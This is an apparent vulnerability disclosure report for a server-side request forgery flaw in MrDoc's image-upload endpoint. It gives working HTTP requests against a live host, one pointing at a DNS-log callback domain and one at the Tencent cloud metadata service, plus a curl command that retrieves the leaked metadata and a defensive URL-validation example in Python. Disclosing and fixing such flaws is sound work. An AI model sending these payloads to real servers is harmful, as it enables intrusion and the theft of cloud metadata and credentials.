Server-Side Request Forgery (SSRF) in zmister2016/mrdoc
Reported on
Oct 16th 2021
Description
● SSRF in /upload_doc_img/: an attacker could abuse the url parameter to reach any intranet host in the environment of the MrDoc server, breaking the network boundary.
● Depending on the environment, it could leak sensitive metadata, according to https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb#gistcomment-3882255
Proof of Concept
HTTP request, tested on http://mrdoc.zmister.com/modify_doc/3778/
POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 88
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
DNT: 1
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close
{"url":"http://upload_doc_img.0yuj7c.ceye.io/media/202110/2021-10-17_000846_478019.png"}
DNSLOG response
(2) Leaking sensitive content. According to cloud_metadata.txt, I could retrieve the cloud metadata of mrdoc.zmister.com (123.207.234.22). Firstly,
POST /upload_doc_img/ HTTP/1.1
Host: mrdoc.zmister.com
Content-Length: 58
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
DNT: 1
Content-Type: application/json; charset=UTF-8
Accept: */*
Origin: http://mrdoc.zmister.com
Referer: http://mrdoc.zmister.com/create_doc/?pid=930
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: Hm_lvt_95f55ea1c5936e35e732966bef35e4a5=1634395760; csrftoken=b4FuQm8mnBKS8oZPUlF9HuKamFy7qXCow0jeuGXgcTdFhhYWOrbJf2G5MuxTPj0Z; sessionid=mu3ptwhqzhmqnnmywvi3jpiwzybpx91b; Hm_lpvt_95f55ea1c5936e35e732966bef35e4a5=1634400403
Connection: close
{"url":"http://metadata.tencentyun.com/latest/meta-data/"}
The response from the MrDoc server should look like:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Oct 2021 16:41:27 GMT
Content-Type: application/json
Content-Length: 163
Connection: close
X-Frame-Options: SAMEORIGIN
Vary: Accept-Language, Cookie
Content-Language: zh-hans
Expires: Sun, 17 Oct 2021 04:41:27 GMT
Cache-Control: max-age=43200
Cache-Control: no-cache
{"msg": "", "code": 0, "data": {"originalURL": "http://metadata.tencentyun.com/latest/meta-data/", "url": "/media/202110/2021-10-17_0041270.8239697654653059.png"}}
● So, we could retrieve it by running:
curl http://mrdoc.zmister.com/media/202110/2021-10-17_0041270.8239697654653059.png
Result:
app-id
instance-id
local-ipv4
mac
public-ipv4
uuid
instance-name
placement/
payment/
network/
volumes/
instance/
public-keys/
ntp/*
Impact
This vulnerability allows HTTP GET requests to arbitrary URLs:
● including private networks
● with the full response retrievable through the resulting PNG
● thus disclosing sensitive content such as cloud metadata
Also present in ice_url_img_upload:
https://github.com/zmister2016/MrDoc/blob/master/app_doc/util_upload_img.py#L100
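The root cause in both locations is the same: the server fetches whatever URL the client supplies and stores the response as an image. The check below is an added example written for this report (not MrDoc's own code) of how a fetch-by-URL endpoint can vet the destination before connecting: allowed schemes only, and every address the host resolves to must be public. The resolver and its DNS table are constructed stand-ins so the example runs offline.

```python
"""Added example, not MrDoc's code: destination vetting for a
"fetch image by URL" endpoint such as /upload_doc_img/."""
import ipaddress
from urllib.parse import urlsplit

# Constructed lookup table standing in for DNS so the example runs offline.
# The metadata entry mirrors the link-local range cloud metadata services use.
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "metadata.tencentyun.com": ["169.254.0.23"],
    "rebind.example.com": ["93.184.216.35", "10.0.0.5"],  # public + private
}


def resolve(host):
    """Hypothetical resolver: every address a name maps to (literal IPs pass through)."""
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return FAKE_DNS.get(host, [])


def is_public_address(ip_text):
    """Reject RFC 1918, loopback, link-local (169.254.0.0/16, where cloud
    metadata lives), reserved, unspecified and multicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url, resolver=resolve):
    """Return (ok, reason). ok only if the scheme is http(s) and *all*
    resolved addresses are public; checking the resolved address rather than
    the host string also covers decimal/octal IP spellings."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    addrs = resolver(parts.hostname.lower())
    if not addrs:
        return False, "host does not resolve"
    bad = [a for a in addrs if not is_public_address(a)]
    if bad:
        return False, "resolves to non-public address " + ",".join(bad)
    return True, "ok"
```

The vetted address must then be the one actually connected to (and redirects disabled or re-validated), otherwise a second DNS lookup inside the HTTP client reopens the rebinding window.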
1) @zmister2016, thank you for the confirmation. 2) Would you please confirm the assignment of a CVE for this issue?